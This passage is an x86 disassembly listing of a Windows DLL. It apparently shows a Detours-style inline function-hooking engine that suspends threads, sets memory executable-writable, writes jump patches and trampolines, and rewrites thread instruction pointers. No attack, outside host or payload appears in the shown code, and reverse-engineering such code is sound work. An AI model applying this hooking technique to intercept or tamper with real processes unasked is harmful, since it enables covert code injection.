loc_1001760E: ; CODE XREF: sub_10017600+8�j
mov eax, [esp+8+arg_4]
test eax, eax
jz short loc_10017619
and dword ptr [eax], 0
loc_10017619: ; CODE XREF: sub_10017600+14�j
mov al, [esi]
cmp al, 0FFh
jnz short loc_10017639
cmp byte ptr [esi+1], 25h
jnz short loc_10017639
mov edi, [esi+2]
push edi ; int
push esi ; lpAddress
call sub_10017656
pop ecx
test al, al
pop ecx
jz short loc_10017651
mov eax, [edi]
jmp short loc_10017653
; ---------------------------------------------------------------------------
loc_10017639: ; CODE XREF: sub_10017600+1D�j
; sub_10017600+23�j
cmp al, 0EBh
jnz short loc_10017651
movsx eax, byte ptr [esi+1]
cmp byte ptr [eax+esi+2], 0E9h
lea eax, [eax+esi+2]
jnz short loc_10017653
add eax, [eax+1]
jmp short loc_10017653
; ---------------------------------------------------------------------------
loc_10017651: ; CODE XREF: sub_10017600+33�j
; sub_10017600+3B�j
mov eax, esi
loc_10017653: ; CODE XREF: sub_10017600+C�j
; sub_10017600+37�j ...
pop edi
pop esi
retn
sub_10017600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10017656(LPCVOID lpAddress, int)
sub_10017656 proc near ; CODE XREF: sub_10017600+2A�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
Buffer = _MEMORY_BASIC_INFORMATION ptr -34h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
lpAddress = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001E5C8
push offset loc_10017470
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 1Ch ; dwLength
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+lpAddress] ; lpAddress
call ds:VirtualQuery ; VirtualQuery
and [ebp+var_4], 0
mov ecx, [ebp+Buffer.AllocationBase]
mov [ebp+var_38], ecx
cmp word ptr [ecx], 5A4Dh
jnz short loc_100176DC
mov eax, [ecx+3Ch]
add eax, ecx
mov [ebp+var_3C], eax
cmp dword ptr [eax], 4550h
jz short loc_100176B4
loc_100176AC: ; CODE XREF: sub_10017656+6A�j
; sub_10017656+79�j
xor al, al
loc_100176AE: ; CODE XREF: sub_10017656+7D�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_100176E2
; ---------------------------------------------------------------------------
loc_100176B4: ; CODE XREF: sub_10017656+54�j
mov edx, [eax+0D8h]
lea esi, [edx+ecx]
cmp [ebp+arg_4], esi
jb short loc_100176AC
mov eax, [eax+0DCh]
add eax, edx
add eax, ecx
cmp [ebp+arg_4], eax
jnb short loc_100176AC
mov al, 1
jmp short loc_100176AE
; ---------------------------------------------------------------------------
loc_100176D5: ; DATA XREF: .rdata:1001E5CC�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_100176D9: ; DATA XREF: .rdata:1001E5D0�o
mov esp, [ebp+var_18]
loc_100176DC: ; CODE XREF: sub_10017656+44�j
or [ebp+var_4], 0FFFFFFFFh
xor al, al
loc_100176E2: ; CODE XREF: sub_10017656+5C�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_10017656 endp
; =============== S U B R O U T I N E =======================================
sub_100176F1 proc near ; CODE XREF: sub_1001338E+3�p
; sub_100134D4+3�p
push esi
xor esi, esi
cmp Destination, esi
jnz short loc_10017713
call ds:GetCurrentThreadId ; GetCurrentThreadId
push esi ; Comperand
push eax ; Exchange
push offset Destination ; Destination
call ds:InterlockedCompareExchange ; InterlockedCompareExchange
test eax, eax
jz short loc_1001771A
loc_10017713: ; CODE XREF: sub_100176F1+9�j
mov eax, 10DDh
pop esi
retn
; ---------------------------------------------------------------------------
loc_1001771A: ; CODE XREF: sub_100176F1+20�j
mov dword_10073FA8, esi
mov dword_10073FBC, esi
mov dword_10073FB8, esi
mov dword_10073FB0, esi
mov dword_10073FB4, esi
call sub_10017741
xor eax, eax
pop esi
retn
sub_100176F1 endp
; =============== S U B R O U T I N E =======================================
sub_10017741 proc near ; CODE XREF: sub_100176F1+47�p
flOldProtect = dword ptr -4
push ecx
push esi
mov esi, lpAddress
loc_10017749: ; CODE XREF: sub_10017741+22�j
test esi, esi
jz short loc_10017765
lea eax, [esp+8+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push 10000h ; dwSize
push esi ; lpAddress
call ds:VirtualProtect ; VirtualProtect
mov esi, [esi+4]
jmp short loc_10017749
; ---------------------------------------------------------------------------
loc_10017765: ; CODE XREF: sub_10017741+A�j
pop esi
pop ecx
retn
sub_10017741 endp
; =============== S U B R O U T I N E =======================================
sub_10017768 proc near ; CODE XREF: sub_1001785F+3B�p
flOldProtect = dword ptr -4
push ecx
call ds:GetCurrentThreadId ; GetCurrentThreadId
cmp Destination, eax
jz short loc_1001777E
mov eax, 10DDh
pop ecx
retn
; ---------------------------------------------------------------------------
loc_1001777E: ; CODE XREF: sub_10017768+D�j
push ebx
push esi
mov esi, dword_10073FBC
xor ebx, ebx
cmp esi, ebx
push edi
jz short loc_100177CB
loc_1001778D: ; CODE XREF: sub_10017768+61�j
lea eax, [esp+10h+flOldProtect]
push eax ; lpflOldProtect
mov eax, [esi+10h]
push dword ptr [esi+14h] ; flNewProtect
movzx eax, byte ptr [eax+17h]
push eax ; dwSize
push dword ptr [esi+0Ch] ; lpAddress
call ds:VirtualProtect ; VirtualProtect
cmp [esi+4], ebx
jnz short loc_100177BC
mov eax, [esi+10h]
cmp eax, ebx
jz short loc_100177BC
push eax ; Dst
call sub_10017832
pop ecx
mov [esi+10h], ebx
loc_100177BC: ; CODE XREF: sub_10017768+41�j
; sub_10017768+48�j
mov edi, [esi]
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
cmp edi, ebx
pop ecx
mov esi, edi
jnz short loc_1001778D
loc_100177CB: ; CODE XREF: sub_10017768+23�j
mov dword_10073FBC, ebx
call sub_1001780B
mov esi, dword_10073FB8
cmp esi, ebx
jz short loc_100177F8
loc_100177E0: ; CODE XREF: sub_10017768+8E�j
push dword ptr [esi+4] ; hThread
call ds:ResumeThread ; ResumeThread
mov edi, [esi]
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
cmp edi, ebx
pop ecx
mov esi, edi
jnz short loc_100177E0
loc_100177F8: ; CODE XREF: sub_10017768+76�j
pop edi
mov dword_10073FB8, ebx
mov Destination, ebx
pop esi
xor eax, eax
pop ebx
pop ecx
retn
sub_10017768 endp
; =============== S U B R O U T I N E =======================================
sub_1001780B proc near ; CODE XREF: sub_10017768+69�p
; sub_1001785F+208�p
flOldProtect = dword ptr -4
push ecx
push esi
mov esi, lpAddress
loc_10017813: ; CODE XREF: sub_1001780B+22�j
test esi, esi
jz short loc_1001782F
lea eax, [esp+8+flOldProtect]
push eax ; lpflOldProtect
push 20h ; flNewProtect
push 10000h ; dwSize
push esi ; lpAddress
call ds:VirtualProtect ; VirtualProtect
mov esi, [esi+4]
jmp short loc_10017813
; ---------------------------------------------------------------------------
loc_1001782F: ; CODE XREF: sub_1001780B+A�j
pop esi
pop ecx
retn
sub_1001780B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10017832(void *Dst)
sub_10017832 proc near ; CODE XREF: sub_10017768+4B�p
; sub_1001785F+1EA�p ...
Dst = dword ptr 4
push esi
push edi
mov edi, [esp+8+Dst]
push 20h ; Size
mov esi, edi
push 0 ; Val
push edi ; Dst
and si, 0
call memset ; memset
mov eax, [esi+8]
add esp, 0Ch
mov [edi+18h], eax
mov [esi+8], edi
pop edi
pop esi
retn
sub_10017832 endp
; =============== S U B R O U T I N E =======================================
sub_10017857 proc near ; CODE XREF: sub_1001338E+13F�p
; sub_100134D4+13F�p
push 0
call sub_1001785F
retn
sub_10017857 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001785F proc near ; CODE XREF: sub_10017857+2�p
Context = CONTEXT ptr -2D4h
flOldProtect = dword ptr -8
hProcess = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
jz short loc_1001787A
mov ecx, dword_10073FB4
mov [eax], ecx
loc_1001787A: ; CODE XREF: sub_1001785F+11�j
call ds:GetCurrentThreadId ; GetCurrentThreadId
cmp Destination, eax
jz short loc_10017892
mov eax, 10DDh
jmp loc_10017AB0
; ---------------------------------------------------------------------------
loc_10017892: ; CODE XREF: sub_1001785F+27�j
cmp dword_10073FB0, ebx
jz short loc_100178A4
call sub_10017768
jmp loc_10017AAB
; ---------------------------------------------------------------------------
loc_100178A4: ; CODE XREF: sub_1001785F+39�j
push esi
mov esi, dword_10073FBC
push edi
loc_100178AC: ; CODE XREF: sub_1001785F+EF�j
cmp esi, ebx
jz loc_10017953
cmp [esi+4], ebx
mov eax, [esi+10h]
jz short loc_10017911
xor edi, edi
cmp byte ptr [eax+17h], 0
jbe short loc_100178EC
loc_100178C4: ; CODE XREF: sub_1001785F+8B�j
lea ecx, [ebp+hProcess]
mov [ebp+hProcess], ebx
push ecx
push ebx
push eax
mov eax, [esi+0Ch]
add eax, edi
push eax
call sub_10018593
cmp [ebp+hProcess], ebx
jnz short loc_100178EC
mov ecx, [esi+10h]
mov edi, eax
sub edi, ecx
movzx ecx, byte ptr [ecx+17h]
cmp edi, ecx
jl short loc_100178C4
loc_100178EC: ; CODE XREF: sub_1001785F+63�j
; sub_1001785F+7C�j
mov eax, [esi+10h]
movzx eax, byte ptr [eax+17h]
cmp edi, eax
jz short loc_10017909
mov dword_10073FB0, 0Dh
mov eax, [esi+8]
mov dword_10073FB4, eax
loc_10017909: ; CODE XREF: sub_1001785F+96�j
mov eax, [esi+8]
mov ecx, [esi+0Ch]
jmp short loc_1001794A
; ---------------------------------------------------------------------------
loc_10017911: ; CODE XREF: sub_1001785F+5B�j
mov ecx, [eax+1Ch]
mov eax, [esi+0Ch]
lea edx, [eax+5]
mov byte ptr [eax], 0E9h
inc eax
sub ecx, edx
mov [eax], ecx
mov ecx, [esi+10h]
lea edi, [eax+4]
mov ecx, [ecx+18h]
cmp edi, ecx
jnb short loc_10017944
sub ecx, edi
mov eax, 0CCCCCCCCh
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_10017944: ; CODE XREF: sub_1001785F+CE�j
mov eax, [esi+8]
mov ecx, [esi+10h]
loc_1001794A: ; CODE XREF: sub_1001785F+B0�j
mov [eax], ecx
mov esi, [esi]
jmp loc_100178AC
; ---------------------------------------------------------------------------
loc_10017953: ; CODE XREF: sub_1001785F+4F�j
mov edi, dword_10073FB8
cmp edi, ebx
jz loc_100179FD
mov ebx, ds:SetThreadContext
loc_10017967: ; CODE XREF: sub_1001785F+196�j
lea eax, [ebp+Context]
mov [ebp+Context.ContextFlags], 10001h
push eax ; lpContext
push dword ptr [edi+4] ; hThread
call ds:GetThreadContext ; GetThreadContext
test eax, eax
jz short loc_100179F1
mov esi, dword_10073FBC
loc_1001798B: ; CODE XREF: sub_1001785F+190�j
test esi, esi
jz short loc_100179F1
cmp dword ptr [esi+4], 0
jz short loc_100179B6
mov eax, [esi+10h]
cmp [ebp+Context._Eip], eax
jb short loc_100179ED
lea ecx, [eax+4]
cmp [ebp+Context._Eip], ecx
jnb short loc_100179ED
sub [ebp+Context._Eip], eax
mov eax, [esi+0Ch]
jmp short loc_100179DB
; ---------------------------------------------------------------------------
loc_100179B6: ; CODE XREF: sub_1001785F+134�j
mov eax, [esi+0Ch]
cmp [ebp+Context._Eip], eax
jb short loc_100179ED
mov ecx, [esi+10h]
movzx ecx, byte ptr [ecx+17h]
add ecx, eax
cmp [ebp+Context._Eip], ecx
jnb short loc_100179ED
sub [ebp+Context._Eip], eax
mov eax, [esi+10h]
loc_100179DB: ; CODE XREF: sub_1001785F+155�j
add [ebp+Context._Eip], eax
lea eax, [ebp+Context]
push eax ; lpContext
push dword ptr [edi+4] ; hThread
call ebx ; SetThreadContext
loc_100179ED: ; CODE XREF: sub_1001785F+13F�j
; sub_1001785F+14A�j ...
mov esi, [esi]
jmp short loc_1001798B
; ---------------------------------------------------------------------------
loc_100179F1: ; CODE XREF: sub_1001785F+124�j
; sub_1001785F+12E�j
mov edi, [edi]
test edi, edi
jnz loc_10017967
xor ebx, ebx
loc_100179FD: ; CODE XREF: sub_1001785F+FC�j
call ds:GetCurrentProcess ; GetCurrentProcess
mov esi, dword_10073FBC
mov [ebp+hProcess], eax
cmp esi, ebx
jz short loc_10017A61
loc_10017A10: ; CODE XREF: sub_1001785F+200�j
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
mov eax, [esi+10h]
push dword ptr [esi+14h] ; flNewProtect
movzx eax, byte ptr [eax+17h]
push eax ; dwSize
push dword ptr [esi+0Ch] ; lpAddress
call ds:VirtualProtect ; VirtualProtect
mov eax, [esi+10h]
movzx eax, byte ptr [eax+17h]
push eax ; dwSize
push dword ptr [esi+0Ch] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call ds:FlushInstructionCache ; FlushInstructionCache
cmp [esi+4], ebx
jz short loc_10017A52
mov eax, [esi+10h]
cmp eax, ebx
jz short loc_10017A52
push eax ; Dst
call sub_10017832
pop ecx
mov [esi+10h], ebx
loc_10017A52: ; CODE XREF: sub_1001785F+1E0�j
; sub_1001785F+1E7�j
mov edi, [esi]
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
cmp edi, ebx
pop ecx
mov esi, edi
jnz short loc_10017A10
loc_10017A61: ; CODE XREF: sub_1001785F+1AF�j
mov dword_10073FBC, ebx
call sub_1001780B
mov esi, dword_10073FB8
cmp esi, ebx
jz short loc_10017A8E
loc_10017A76: ; CODE XREF: sub_1001785F+22D�j
push dword ptr [esi+4] ; hThread
call ds:ResumeThread ; ResumeThread
mov edi, [esi]
push esi ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
cmp edi, ebx
pop ecx
mov esi, edi
jnz short loc_10017A76
loc_10017A8E: ; CODE XREF: sub_1001785F+215�j
mov eax, [ebp+arg_0]
pop edi
cmp eax, ebx
mov dword_10073FB8, ebx
mov Destination, ebx
pop esi
jz short loc_10017AAB
mov ecx, dword_10073FB4
mov [eax], ecx
loc_10017AAB: ; CODE XREF: sub_1001785F+40�j
; sub_1001785F+242�j
mov eax, dword_10073FB0
loc_10017AB0: ; CODE XREF: sub_1001785F+2E�j
pop ebx
leave
retn 4
sub_1001785F endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_10017AB5(HANDLE hThread)
sub_10017AB5 proc near ; CODE XREF: sub_1001338E+F�p
; sub_100134D4+F�p
hThread = dword ptr 4
mov eax, dword_10073FB0
push esi
test eax, eax
push edi
jnz short loc_10017B1F
call ds:GetCurrentThread ; GetCurrentThread
mov edi, [esp+8+hThread]
cmp edi, eax
jz short loc_10017B1D
push 8 ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
pop ecx
test esi, esi
jnz short loc_10017AE1
push 8
pop edi
jmp short loc_10017AFC
; ---------------------------------------------------------------------------
loc_10017AE1: ; CODE XREF: sub_10017AB5+25�j
push edi ; hThread
call ds:SuspendThread ; SuspendThread
cmp eax, 0FFFFFFFFh
jnz short loc_10017B0D
call ds:GetLastError
push esi ; void *
mov edi, eax
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_10017AFC: ; CODE XREF: sub_10017AB5+2A�j
and dword_10073FB4, 0
mov dword_10073FB0, edi
mov eax, edi
jmp short loc_10017B1F
; ---------------------------------------------------------------------------
loc_10017B0D: ; CODE XREF: sub_10017AB5+36�j
mov [esi+4], edi
mov eax, dword_10073FB8
mov [esi], eax
mov dword_10073FB8, esi
loc_10017B1D: ; CODE XREF: sub_10017AB5+17�j
xor eax, eax
loc_10017B1F: ; CODE XREF: sub_10017AB5+9�j
; sub_10017AB5+56�j
pop edi
pop esi
retn 4
sub_10017AB5 endp
; =============== S U B R O U T I N E =======================================
sub_10017B24 proc near ; CODE XREF: sub_1000FB92+C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
push eax ; void *
push eax ; int
push eax ; int
push [esp+0Ch+arg_4] ; int
push [esp+10h+arg_0] ; int
call sub_10017B39
retn 8
sub_10017B24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10017B39(int, int, int, int, void *)
sub_10017B39 proc near ; CODE XREF: sub_10017B24+D�p
flOldProtect = dword ptr -0Ch
lpAddress = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_8]
push ebx
push esi
xor esi, esi
cmp eax, esi
push edi
mov [ebp+var_4], esi
jz short loc_10017B50
mov [eax], esi
loc_10017B50: ; CODE XREF: sub_10017B39+13�j
mov eax, [ebp+arg_C]
cmp eax, esi
jz short loc_10017B59
mov [eax], esi
loc_10017B59: ; CODE XREF: sub_10017B39+1C�j
mov ebx, [ebp+arg_10]
cmp ebx, esi
jz short loc_10017B62
mov [ebx], esi
loc_10017B62: ; CODE XREF: sub_10017B39+25�j
call ds:GetCurrentThreadId ; GetCurrentThreadId
cmp Destination, eax
jz short loc_10017B7A
mov eax, 10DDh
jmp loc_10017D86
; ---------------------------------------------------------------------------
loc_10017B7A: ; CODE XREF: sub_10017B39+35�j
mov eax, dword_10073FB0
cmp eax, esi
jnz loc_10017D86
mov ecx, [ebp+arg_0]
cmp ecx, esi
jnz short loc_10017B96
push 6
pop eax
jmp loc_10017D86
; ---------------------------------------------------------------------------
loc_10017B96: ; CODE XREF: sub_10017B39+53�j
mov eax, [ecx]
cmp eax, esi
jnz short loc_10017BA9
push 6
pop eax
mov dword_10073FB0, eax
jmp loc_10017D3E
; ---------------------------------------------------------------------------
loc_10017BA9: ; CODE XREF: sub_10017B39+61�j
push esi ; int
push eax ; lpAddress
mov [ebp+arg_10], esi
call sub_100175EE
push 0 ; int
mov edi, eax
push [ebp+arg_4] ; lpAddress
mov [ebp+lpAddress], edi
call sub_100175EE
cmp eax, edi
mov [ebp+arg_4], eax
jnz short loc_10017BDB
cmp dword_10073FA8, 0
jnz loc_10017D38
jmp loc_10017D16
; ---------------------------------------------------------------------------
loc_10017BDB: ; CODE XREF: sub_10017B39+8E�j
mov ecx, [ebp+arg_C]
test ecx, ecx
jz short loc_10017BE4
mov [ecx], edi
loc_10017BE4: ; CODE XREF: sub_10017B39+A7�j
test ebx, ebx
jz short loc_10017BEA
mov [ebx], eax
loc_10017BEA: ; CODE XREF: sub_10017B39+AD�j
push 18h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
test eax, eax
pop ecx
mov [ebp+arg_10], eax
jnz short loc_10017C05
loc_10017BF9: ; CODE XREF: sub_10017B39+D7�j
mov [ebp+var_4], 8
jmp loc_10017D16
; ---------------------------------------------------------------------------
loc_10017C05: ; CODE XREF: sub_10017B39+BE�j
push edi
call sub_10017DDC
mov esi, eax
pop ecx
test esi, esi
jz short loc_10017BF9
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_10017C1B
mov [eax], esi
loc_10017C1B: ; CODE XREF: sub_10017B39+DE�j
mov eax, edi
xor ebx, ebx
jmp short loc_10017C24
; ---------------------------------------------------------------------------
loc_10017C21: ; CODE XREF: sub_10017B39+11F�j
mov eax, [ebp+arg_8]
loc_10017C24: ; CODE XREF: sub_10017B39+E6�j
and [ebp+arg_C], 0
lea ecx, [ebp+arg_C]
push ecx
push 0
mov [ebp+var_4], eax
push eax
lea eax, [ebx+esi]
push eax
call sub_10018593
cmp [ebp+arg_C], 0
mov [ebp+arg_8], eax
jnz short loc_10017C5A
push [ebp+var_4]
mov ebx, eax
sub ebx, edi
call sub_10017D8D
test eax, eax
pop ecx
jnz short loc_10017C5A
cmp ebx, 5
jl short loc_10017C21
loc_10017C5A: ; CODE XREF: sub_10017B39+109�j
; sub_10017B39+11A�j
cmp ebx, 5
jge short loc_10017C78
cmp dword_10073FA8, 0
mov [ebp+var_4], 9
jnz loc_10017D1E
jmp loc_10017D16
; ---------------------------------------------------------------------------
loc_10017C78: ; CODE XREF: sub_10017B39+124�j
cmp ebx, 12h
jbe short loc_10017C89
mov [ebp+var_4], 6
jmp loc_10017D16
; ---------------------------------------------------------------------------
loc_10017C89: ; CODE XREF: sub_10017B39+142�j
mov eax, [ebp+arg_4]
lea ecx, [esi+17h]
mov [esi+1Ch], eax
lea edx, [ebx+edi]
lea eax, [ebx+esi]
mov [esi+18h], edx
mov [ecx], bl
lea edi, [eax+5]
mov byte ptr [eax], 0E9h
inc eax
sub edx, edi
lea edi, [eax+4]
mov [eax], edx
cmp edi, ecx
jnb short loc_10017CC4
sub ecx, edi
mov eax, 0CCCCCCCCh
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_10017CC4: ; CODE XREF: sub_10017B39+174�j
mov edi, [ebp+arg_10]
and [ebp+flOldProtect], 0
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push ebx ; dwSize
push [ebp+lpAddress] ; lpAddress
call ds:VirtualProtect ; VirtualProtect
test eax, eax
jz short loc_10017D0D
push [ebp+lpAddress] ; lpAddress
call sub_10017FD3
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_10017D5E
cmp word ptr [ebx+1Ch], 6544h
jz short loc_10017D5E
and [ebp+arg_4], 0
lea eax, [ebp+arg_4]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push 40h ; dwSize
push ebx ; lpAddress
call ds:VirtualProtect ; VirtualProtect
test eax, eax
jnz short loc_10017D46
loc_10017D0D: ; CODE XREF: sub_10017B39+1A4�j
call ds:GetLastError
mov [ebp+var_4], eax
loc_10017D16: ; CODE XREF: sub_10017B39+9D�j
; sub_10017B39+C7�j ...
mov eax, [ebp+var_4]
mov dword_10073FB0, eax
loc_10017D1E: ; CODE XREF: sub_10017B39+134�j
test esi, esi
jz short loc_10017D29
push esi ; Dst
call sub_10017832
pop ecx
loc_10017D29: ; CODE XREF: sub_10017B39+1E7�j
cmp [ebp+arg_10], 0
jz short loc_10017D38
push [ebp+arg_10] ; void *
call ??3@YAXPAX@Z ; operator delete(void *)
pop ecx
loc_10017D38: ; CODE XREF: sub_10017B39+97�j
; sub_10017B39+1F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
loc_10017D3E: ; CODE XREF: sub_10017B39+6B�j
mov dword_10073FB4, ecx
jmp short loc_10017D86
; ---------------------------------------------------------------------------
loc_10017D46: ; CODE XREF: sub_10017B39+1D2�j
mov word ptr [ebx+1Ch], 6544h
mov word ptr [ebx+1Eh], 6F74h
mov word ptr [ebx+20h], 7275h
mov word ptr [ebx+22h], 2173h
loc_10017D5E: ; CODE XREF: sub_10017B39+1B3�j
; sub_10017B39+1BB�j
mov eax, [ebp+arg_0]
and dword ptr [edi+4], 0
mov [edi+8], eax
mov eax, [ebp+lpAddress]
mov [edi+10h], esi
mov [edi+0Ch], eax
mov eax, [ebp+flOldProtect]
mov [edi+14h], eax
mov eax, dword_10073FBC
mov [edi], eax
mov dword_10073FBC, edi
xor eax, eax
loc_10017D86: ; CODE XREF: sub_10017B39+3C�j
; sub_10017B39+48�j ...
pop edi
pop esi
pop ebx
leave
retn 14h
sub_10017B39 endp
; =============== S U B R O U T I N E =======================================
sub_10017D8D proc near ; CODE XREF: sub_10017B39+112�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov al, [ecx]
cmp al, 0E9h
jz short loc_10017DD8
cmp al, 0E0h
jz short loc_10017DD8
cmp al, 0C2h
jz short loc_10017DD8
cmp al, 0C3h
jz short loc_10017DD8
cmp al, 0CCh
jz short loc_10017DD8
cmp al, 0FFh
jnz short loc_10017DB1
cmp byte ptr [ecx+1], 25h
jz short loc_10017DD8
loc_10017DB1: ; CODE XREF: sub_10017D8D+1C�j
cmp al, 26h
jz short loc_10017DC9
cmp al, 2Eh
jz short loc_10017DC9
cmp al, 36h
jz short loc_10017DC9
cmp al, 0E3h
jz short loc_10017DC9
cmp al, 64h
jz short loc_10017DC9
cmp al, 65h
jnz short loc_10017DD5
loc_10017DC9: ; CODE XREF: sub_10017D8D+26�j
; sub_10017D8D+2A�j ...
cmp byte ptr [ecx+1], 0FFh
jnz short loc_10017DD5
cmp byte ptr [ecx+2], 25h
jz short loc_10017DD8
loc_10017DD5: ; CODE XREF: sub_10017D8D+3A�j
; sub_10017D8D+40�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_10017DD8: ; CODE XREF: sub_10017D8D+8�j
; sub_10017D8D+C�j ...
push 1
pop eax
retn
sub_10017D8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10017DDC proc near ; CODE XREF: sub_10017B39+CD�p
Buffer = _MEMORY_BASIC_INFORMATION ptr -20h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, 7FF80000h
mov ebx, 10000h
jbe short loc_10017E00
lea eax, [esi-7FF80000h]
mov [ebp+arg_0], eax
jmp short loc_10017E03
; ---------------------------------------------------------------------------
loc_10017E00: ; CODE XREF: sub_10017DDC+17�j
mov [ebp+arg_0], ebx
loc_10017E03: ; CODE XREF: sub_10017DDC+22�j
cmp esi, 80000000h
jnb short loc_10017E16
lea eax, [esi+7FF80000h]
mov [ebp+var_4], eax
jmp short loc_10017E1D
; ---------------------------------------------------------------------------
loc_10017E16: ; CODE XREF: sub_10017DDC+2D�j
mov [ebp+var_4], 0FFF80000h
loc_10017E1D: ; CODE XREF: sub_10017DDC+38�j
mov eax, dword_10073FA4
mov ecx, lpAddress
test eax, eax
jnz short loc_10017E37
test ecx, ecx
jz short loc_10017E4C
mov eax, ecx
mov dword_10073FA4, eax
loc_10017E37: ; CODE XREF: sub_10017DDC+4E�j
mov edx, [eax+8]
test edx, edx
jz short loc_10017E4C
cmp edx, [ebp+arg_0]
jb short loc_10017E4C
cmp edx, [ebp+var_4]
jbe loc_10017FA5
loc_10017E4C: ; CODE XREF: sub_10017DDC+52�j
; sub_10017DDC+60�j ...
mov eax, ecx
test ecx, ecx
mov dword_10073FA4, eax
jz short loc_10017E7C
test eax, eax
jz short loc_10017E70
loc_10017E5B: ; CODE XREF: sub_10017DDC+9E�j
mov ecx, [eax+8]
test ecx, ecx
jz short loc_10017E70
cmp ecx, [ebp+arg_0]
jb short loc_10017E70
cmp ecx, [ebp+var_4]
jbe loc_10017FA5
loc_10017E70: ; CODE XREF: sub_10017DDC+7D�j
; sub_10017DDC+84�j ...
mov eax, [eax+4]
test eax, eax
mov dword_10073FA4, eax
jnz short loc_10017E5B
loc_10017E7C: ; CODE XREF: sub_10017DDC+79�j
mov eax, esi
and eax, 0FFFFh
sub esi, eax
cmp esi, [ebp+arg_0]
mov edi, esi
jbe short loc_10017EE4
loc_10017E8C: ; CODE XREF: sub_10017DDC+EC�j
cmp edi, 70000000h
jb short loc_10017EA1
cmp edi, 80000000h
ja short loc_10017EA1
mov edi, 6FFF0000h
loc_10017EA1: ; CODE XREF: sub_10017DDC+B6�j
; sub_10017DDC+BE�j
lea eax, [ebp+Buffer]
push 1Ch ; dwLength
push eax ; lpBuffer
push edi ; lpAddress
call ds:VirtualQuery ; VirtualQuery
test eax, eax
jz short loc_10017EE4
cmp [ebp+Buffer.State], ebx
jnz short loc_10017EBC
cmp [ebp+Buffer.RegionSize], ebx
jnb short loc_10017ECC
loc_10017EBC: ; CODE XREF: sub_10017DDC+D9�j
mov eax, [ebp+Buffer.AllocationBase]
lea edi, [eax-10000h]
cmp edi, [ebp+arg_0]
ja short loc_10017E8C
jmp short loc_10017EE4
; ---------------------------------------------------------------------------
loc_10017ECC: ; CODE XREF: sub_10017DDC+DE�j
push 40h ; flProtect
push 3000h ; flAllocationType
push ebx ; dwSize
push edi ; lpAddress
call ds:VirtualAlloc ; VirtualAlloc
test eax, eax
mov dword_10073FA4, eax
jnz short loc_10017F5B
loc_10017EE4: ; CODE XREF: sub_10017DDC+AE�j
; sub_10017DDC+D4�j ...
cmp esi, [ebp+var_4]
jnb loc_10017FCC
cmp esi, 70000000h
jb short loc_10017F02
cmp esi, 80000000h
ja short loc_10017F02
mov esi, 80010000h
loc_10017F02: ; CODE XREF: sub_10017DDC+117�j
; sub_10017DDC+11F�j
lea eax, [ebp+Buffer]
push 1Ch ; dwLength
push eax ; lpBuffer
push esi ; lpAddress
call ds:VirtualQuery ; VirtualQuery
test eax, eax
jz loc_10017FCC
cmp [ebp+Buffer.State], ebx
jnz short loc_10017F50
cmp [ebp+Buffer.RegionSize], ebx
jb short loc_10017F50
mov ecx, esi
and ecx, 0FFFFh
jz short loc_10017F38
mov eax, ebx
sub eax, ecx
sub [ebp+Buffer.RegionSize], eax
add [ebp+Buffer.BaseAddress], eax
mov esi, [ebp+Buffer.BaseAddress]
loc_10017F38: ; CODE XREF: sub_10017DDC+14D�j
push 40h ; flProtect
push 3000h ; flAllocationType
push ebx ; dwSize
push esi ; lpAddress
call ds:VirtualAlloc ; VirtualAlloc
test eax, eax
mov dword_10073FA4, eax
jnz short loc_10017F5B
loc_10017F50: ; CODE XREF: sub_10017DDC+13E�j
; sub_10017DDC+143�j
mov eax, [ebp+Buffer.BaseAddress]
mov ecx, [ebp+Buffer.RegionSize]
lea esi, [eax+ecx]
